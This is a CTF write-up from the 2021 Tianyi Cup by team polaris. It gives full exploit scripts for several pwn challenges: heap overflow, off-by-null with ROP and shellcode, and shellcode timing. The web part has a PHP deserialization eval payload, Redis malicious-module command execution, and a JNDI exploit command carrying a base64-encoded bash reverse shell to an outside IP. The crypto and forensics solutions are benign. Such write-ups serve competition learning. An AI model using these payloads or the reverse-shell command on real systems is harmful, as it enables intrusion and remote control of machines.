2021“天翼杯”网络安全攻防大赛 wp - polaris

admin 2021年10月1日01:06:01CTF专场评论518 views10113字阅读33分42秒阅读模式

2021第二届“天翼杯”网络安全攻防大赛 - polaris

2021“天翼杯”网络安全攻防大赛 wp - polaris


2021“天翼杯”网络安全攻防大赛 wp - polaris

Login

签到

签到就是加入QQ群,群公告里面有

PWN

chaos

Vulnerability:

00000000 node            struc ; (sizeof=0x211, mappedto_8)
00000000 field_0 db 512 dup(?)
00000200 size dd ?
00000204 field_204 dd ?
00000208 next dq ? ; offset
00000210 field_210 db ?
00000211 node ends

As above, it set the size to 0x208 over the length of buf. So it follows that we can result in heap overflow.

void __fastcall add(const char *a1)
{
int size; // [rsp+14h] [rbp-2Ch]
node *buf; // [rsp+18h] [rbp-28h]
node *tmp_link; // [rsp+20h] [rbp-20h]
char s[12]; // [rsp+2Ch] [rbp-14h] BYREF
unsigned __int64 v5; // [rsp+38h] [rbp-8h]

v5 = __readfsqword(0x28u);
if ( strcmp(a1, "Cr4at3") )
{
puts("error.");
exit(5);
}
printf(">>> ");
memset(s, 0, sizeof(s));
read(0, s, 0xBuLL);
size = atoi(s);
if ( size <= 0 || size > 0x208 )
{
puts("error.");
exit(5);
}
buf = (node *)malloc(0x210uLL);
buf->next = 0LL;
tmp_link = node_link;
node_link = buf;
buf->next = tmp_link;
buf->size = size;
printf(">>> ");
read(0, buf, (unsigned int)buf->size);
}

Exploit:

1.leak2.hijack hook3.get shell

#!/usr/bin/python3
# -*- coding:utf-8 -*-

from pwn import *
import os, struct, random, time, sys, signal

context.arch = 'amd64'
# context.log_level = 'debug'
# sh = process('./chaos')
sh = remote('8.134.97.12', 25036)


def add(content):
sh.sendlineafter(b'>>> ', b'opcode:1npasswd:Cr4at3 n')

sh.sendafter(b'>>> ', b'520')
sh.sendafter(b'>>> ', content)

def show(offset):
sh.sendlineafter(b'>>> ', b'opcode:2npasswd:SH0w n')
sh.sendafter(b'>>> ', str(offset).encode())

def edit(offset, content):
sh.sendlineafter(b'>>> ', b'opcode:3npasswd:Ed1t n')
sh.sendafter(b'>>> ', str(offset).encode())
sh.sendafter(b'>>> ', content)

def delete(offset):
sh.sendlineafter(b'>>> ', b'opcode:4npasswd:D3l4te n')
sh.sendafter(b'>>> ', str(offset).encode())

for i in range(9):
add(b'a')
for i in range(9):
delete(0)
for i in range(7):
add(b' ')

add(b'b' * 8)
show(0)
sh.recvuntil(b'bbbbbbbb')
libc_addr = u64(sh.recvn(6) + b'') - 0x3ebeb0
success('libc_addr: ' + hex(libc_addr))

for i in range(8):
delete(0)
add(b' ')
add(b' ')
delete(0)

edit(0, b'' * 0x200 + p32(0x1000))
edit(0, b'' * 0x200 + p64(0x1000) + b'' * 0x38 + p64(libc_addr + 0x3ed8e8 - 8))
add(b' ')
add(b'/bin/sh' + p64(libc_addr + 0x4f550))
delete(0)

sh.interactive()

# flag{Arb1Tr4ry_Re4d_Wr1t3_1n_L1nkl1st}
# flag{c6MsFlPDHqkb0mAr2oeTV4UuCLNB7KOv}

ezshell

Run shellcode

#!/usr/bin/python3
# -*- coding:utf-8 -*-

from pwn import *
import os, struct, random, time, sys, signal

context.arch = 'amd64'
context.log_level = 'error'
# sh = process('./ezshell')
sh = remote('8.134.37.86', 28310)

shellcode = asm('''
xor eax,eax
push rax
mov rax, 0x67616c66 ;// flag
push rax
mov rdi, rsp
xor esi, esi
xor eax, eax
mov al, 2
syscall

xor eax,eax
push rax
mov rax, 0x67616c66 ;// flag
push rax
mov rdi, rsp
xor esi, esi
xor eax, eax
mov al, 2
syscall

xor eax,eax
push rax
mov rax, 0x67616c66 ;// flag
push rax
mov rdi, rsp
xor esi, esi
xor eax, eax
mov al, 2
syscall

xor eax,eax
push rax
mov rax, 0x67616c66 ;// flag
push rax
mov rdi, rsp
xor esi, esi
xor eax, eax
mov al, 2
syscall

xor eax,eax
push rax
mov rax, 0x67616c66 ;// flag
push rax
mov rdi, rsp
xor esi, esi
xor eax, eax
mov al, 2
syscall

loop1:
test rax, rax
js loop1

mov edi, eax
xor eax, eax
mov rsi, rsp
mov edx, 0x01010101
syscall

xor eax, eax
xor ebx, ebx
mov al, %d
mov bl, [rsp+rax]
sub bl, %d
loop2:
test rbx, rbx
jz loop2
int3
''' % (int(sys.argv[1]), int(sys.argv[2])))
open('./shellcode', 'wb').write(shellcode)


encode_shellcode = os.popen('cd alpha3; python2 ALPHA3.py x64 ascii mixedcase rdx --input=../shellcode ;')

sh.sendafter(b'shellcode?n', encode_shellcode.read())

now = time.time()
sh.recvrepeat(5)
diff = time.time() - now
if(diff > 4):
print('yes')
# flag{Orpwn2jARhxISTsEvzuY1lVZa8WCXkb5}

overheap

Vulnerability:

Just off-by-null, as we can be seen from the challenge hint.

Exploit:

1.leak libc and heap address information2.chunk overlap3.hijack stdout to leak stack address information4.hijack stack5.ROP and run shellcode

The remote server can't fork process to be not able to execute the function system().

#!/usr/bin/python3
# -*- coding:utf-8 -*-

from pwn import *
import os, struct, random, time, sys, signal

context.arch = 'amd64']
# context.log_level = 'debug'
# sh = process('./overheap')
sh = remote('8.134.51.71', 22213)
def add(size):
sh.sendlineafter(b'>> ', b'1')
sh.sendlineafter(b'Size:', str(size).encode())

def show(index):
sh.sendlineafter(b'>> ', b'2')
sh.sendlineafter(b'id:', str(index).encode())

def edit(index, content, raw=False):
sh.sendlineafter(b'>> ', b'3')
sh.sendlineafter(b'id:', str(index).encode())
if(raw):
sh.sendafter(b'Content:', content)
else:
sh.sendlineafter(b'Content:', content)

def delete(index):
sh.sendlineafter(b'>> ', b'4')
sh.sendlineafter(b'id:', str(index).encode())

add(0x18)
add(0x500)
add(0x18)
add(0x510)
add(0x18)
delete(1)
delete(3)
add(0x600)
add(0x500)
show(3)

result = u64(sh.recvn(8))
libc_addr = result - 0x2190f0
success('libc_addr: ' + hex(libc_addr))
heap_addr = u64(sh.recvn(8)) - 0x7e0
success('heap_addr: ' + hex(heap_addr))
add(0x510)

add(0xf8)
add(0x590)
edit(7, b'' * 0x4f0 + p64(0x21) * 14)
edit(6, p64(0) + p64(0xf1) + p64(heap_addr + 0x1340) + p64(heap_addr + 0x1340) + b'' * 0xd0 + p64(0xf0), 1)
delete(7)
add(0x68)
add(0x68)
delete(8)
delete(7)

stdout = libc_addr + 0x219760

environ = libc_addr + 0x220ec0

next_key = ((heap_addr + 0x1000) >> 0xc) ^ (stdout)
edit(6, b'' * 0x8 + p64(0x71) + p64(next_key))
add(0x68)
add(0x68)
add(0x68)
edit(8, p64(0xfbad2887|0x1000) + p64(0) * 3 + p64(environ) + p64(environ+8) * 2)

stack_addr = u64(sh.recvn(8))
success('stack_addr: ' + hex(stack_addr))

delete(9)
delete(7)

offset = +0
next_key = ((heap_addr + 0x1000) >> 0xc) ^ ((stack_addr-0x180 + offset)&(~0xf))
edit(6, b'' * 0x8 + p64(0x71) + p64(next_key))
add(0x68)
add(0x68)

layout = [
libc_addr + 0x000000000002e6c5, #: pop rdi; ret;
stack_addr & ~(0xfff),
libc_addr + 0x0000000000030081, #: pop rsi; ret;
0x2000,
libc_addr + 0x00000000001221f1, #: pop rdx; pop r12; ret;
7,0,
libc_addr + 0x0000000000049f00, #: pop rax; ret;
3,
libc_addr + 0x000000000008139b, #: add eax, edx; ret;
libc_addr + 0x0000000000095186, #: syscall; ret;
stack_addr-0xc0,
]

shellcode = asm('''
;// mov rax, 0x7478742e67616c66 ;// flag.txt
;// mov rax, 0x67616c662f ;// /flag
mov rax, 0x67616c66 ;// flag
push 0
push rax
mov rdi, rsp
xor esi, esi
mov eax, 2
syscall

cmp eax, 0
js fail

mov edi, eax
mov rsi, rsp
add rsi, 0x200
push rsi
mov edx, 100
xor eax, eax
syscall ;// read

mov edx, eax
mov eax, 1
pop rsi
mov edi, eax
syscall ;// write

jmp exit

fail:
mov rax, 0x727265206e65706f ;// open error!
mov [rsp], rax
mov eax, 0x0921726f
add eax, 0x01000000
mov [rsp+8], rax
mov rsi, rsp
mov edi, 1
mov edx, 12
mov eax, edi
syscall ;// write


exit:
xor edi, edi
mov eax, 231
syscall
''')

edit(9, p32(0) + p32(0x1f8) + p8((stack_addr-0x150 + offset) & 0xff) + b'a' * 0x7 +
p64(libc_addr + 0x000000000002c7a9) + p64(libc_addr + 0x000000000002e6c5) + p64(libc_addr + 0x1dbc3a) + p64(libc_addr + 0x644b0) + flat(layout) + shellcode)

sh.interactive()
# flag{icOpmxhuFMAjgbQkKb7dgSjUrlx0KfNk}

Web

esay_eval

小写对象a绕过

payload
?poc=O:1:"B":1:{s:1:"a";O:1:"a":2:{s:4:"code";s:16:"eval($_POST[0]);";}}

answord连接

使用redis加载恶意so执行系统命令

phpinfo可以看到open_base_dir有www和/tmp

/tmp可写

上传恶意so到/tmp

www文件夹下有swp文件,内有密码you_cannot_guess_it

使用redis插件连接redis

module load /tmp/exp.so
system.exec "ls /"


2021“天翼杯”网络安全攻防大赛 wp - polaris

jackson

原题不说了嗷

https://www.redmango.top/article/61#javaweb


2021“天翼杯”网络安全攻防大赛 wp - polaris

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A "47.100.27.114" -C 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDAuMjcuMTE0LzgwODggMD4mMQ==}|{base64,-d}|{bash,-i}'


2021“天翼杯”网络安全攻防大赛 wp - polaris

Crypto

TryHash

from pwn import *
from gmpy2 import *
from hashlib import sha256
from ctypes import *
from Crypto.Util.number import *

def encrypt(text,key):
text=[text[i:i+16:] for i in range(0,len(text),16)]
delta=0x9e3779b9
s=c_uint32(0)
ct=[]
for t in text:
t0=c_uint32(int(t[0:8],16))
t1=c_uint32(int(t[8:16],16))
for i in range(32):
s.value=(s.value+delta)
t0.value+=(((t1.value<<4))+key[0])^(t1.value+s.value)^(((t1.value>>5))+key[1])
t1.value+=(((t0.value<<4))+key[2])^(t0.value+s.value)^(((t0.value>>5))+key[3])
ct.append(hex((t0.value<<32)|t1.value))
return ct

def decrypt(ctext,key):
ctext=[ctext[i:i+16:] for i in range(0,len(ctext),16)]
s=c_uint32(0)
delta=0x9e3779b9
s.value=delta<<5
mt=[]
for t in ctext:
t0=c_uint32(int(t[0:8],16))
t1=c_uint32(int(t[8:16],16))
for i in range(32):
t1.value-=(((t0.value<<4))+key[2])^(t0.value+s.value)^(((t0.value>>5))+key[3])
t0.value-=(((t1.value<<4))+key[0])^(t1.value+s.value)^(((t1.value>>5))+key[1])
s.value-=delta
m=((t0.value<<32)|t1.value)
mt.append(hex(m))
return mt

s = remote("8.134.37.86",21146)
s.recvuntil("XXX+")
a = s.recvuntil(")")
la = a[:-1]
s.recvuntil("==")
a = s.recvuntil("n")
a = a[1:-1]
print(la,a)
strs='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
def get():
for i in range(64):
for j in range(64):
for k in range(64):
for l in range(64):
t = strs[i]+strs[j]+strs[k]+strs[l]
m = t + la.decode()
p = sha256()
p.update(m.encode("UTF-8"))
d = p.hexdigest()
if a.decode() in d:
return t
ans = get()
print(ans)
s.sendline(ans)

s.recvuntil(b"ce:")
s.sendline(b"0")
s.recvuntil("for you")
s.sendline(b"Iamthesuperadmim")

strs=s.recvline()
c = bytes_to_long(strs[:-1])
c = hex(c)[2:]
c += (8-(((len(c)-1)%8)+1))*'0'

key = hex(bytes_to_long(b"Iamthesuperadmim"))[2:]
key=[int(key[i:i+8],16) for i in range(0,len(key),8)]
m=decrypt(c,key)
print(m[-1])

c = m.pop()[2:]
c += (8-(((len(c)-1)%8)+1))*'0'
key = hex(bytes_to_long(b"Iamthesuperadmin"))[2:]
key=[int(key[i:i+8],16) for i in range(0,len(key),8)]

m=encrypt(c,key)
m = m.pop()
print(m)

s.recvuntil(b"ce:")
s.sendline(b"1")
s.recvuntil(b"?")
s.sendline(long_to_bytes(eval(m)))
print(s.recvline())

Misc

baby_Geometry

ECC

参考

https://blog.csdn.net/sitebus/article/details/82835492

from sage.all import *

a = 6277
x = 1
y = 5
EC = EllipticCurve(Zmod(a), [x, y])
G = EC(10, 180)
P = EC(5756, 864)
r = 6
lists = [
(1872, 4517),
(226, 2),
(2267, 970),
(6239, 241),
(2859, 3408),
(5000, 774),
(1568, 6031),
(2879, 587),
(2579, 2114),
(2267, 970),
(1568, 6031),
(2879, 587),
(2267, 970),
(4070, 5982),
(5488, 2334),
(5873, 5782)
]
m = []
for c in lists:
C = EC(c)
M = C - r * P
m.append(M[0])
print("flag{" + bytearray(m).decode() + "}")


2021“天翼杯”网络安全攻防大赛 wp - polaris

rrrgggbbb

RGB最低位隐写

三个通道都隐藏了信息,直接stegsolve将其提取出来,发现三个文件头有相似结构,

根据题目提示以及已有可见字符,可以推断组合方式就是r->g->b顺序按字节轮流填充即可

r = open("r","rb").read()
g = open("g","rb").read()
b = open("b","rb").read()

length = len(r)
print(len(r),len(g),len(b))
file = open("flag","wb+")
for i in range(length):
file.write(r[i].to_bytes(1,byteorder='little',signed=False))
file.write(g[i].to_bytes(1,byteorder='little',signed=False))
file.write(b[i].to_bytes(1,byteorder='little',signed=False))


file.close()

发现是BPG格式文件,是一种特殊的图片,直接bpgview工具查看即可得到flag,工具链接

https://bellard.org/bpg/bpg-0.9.8-win64.zip

Browser | SOLVED | working : 昵称不能为空格

imageinfo发现是win7

提示默认浏览器

参考

https://blog.csdn.net/weixin_29811891/article/details/118350644

提取第一部分

volatility -f Browser.raw --profile=Win7SP0x86 printkey -K "SOFTWAREMicrosoftWindowsShellAssociationsUrlAssociationshttpUserChoice"


2021“天翼杯”网络安全攻防大赛 wp - polaris

得到MSEdgeHTM

第二部分grep搜

filescan | grep Edge

得到版本号,92.0.902.78

桌面存在浏览器备份文件

dump后sqlite打开

volatility -f Browser.raw --profile=Win7SP0x86 dumpfiles -Q 0x000000007d95f648 --dump-dir .


2021“天翼杯”网络安全攻防大赛 wp - polaris

找num_visits最多的,拼接

MSEdgeHTM_92.0.902.78_https://weibo.com/login.php

md5后即为flag


文末2021“天翼杯”网络安全攻防大赛 wp - polaris
星盟安全团队招收各路大佬、萌新
欢迎您的加入
Website:www.xmcve.com
简历请投递至:[email protected]2021“天翼杯”网络安全攻防大赛 wp - polaris



本文始发于微信公众号(星盟安全):2021“天翼杯”网络安全攻防大赛 wp - polaris

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年10月1日01:06:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  2021“天翼杯”网络安全攻防大赛 wp - polaris http://cn-sec.com/archives/561596.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: